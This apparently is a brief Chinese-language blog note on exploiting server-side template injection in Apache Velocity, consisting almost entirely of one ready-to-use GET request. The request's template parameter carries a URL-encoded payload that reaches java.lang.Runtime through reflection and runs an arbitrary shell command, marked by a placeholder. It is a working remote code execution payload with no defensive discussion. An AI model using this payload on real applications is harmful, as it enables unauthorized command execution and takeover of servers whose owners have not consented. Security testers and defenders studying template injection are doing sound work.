【笔记】Velocity的SSTI模板注入漏洞利用

发表于 更新于 阅读次数:

前言

Velocity的SSTI模板注入漏洞利用

漏洞利用

<shell>:远程执行的Shell命令

request
1
GET http://127.0.0.1:80/?template=%23set($e=%22e%22);$e.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22<shell>%22)

完成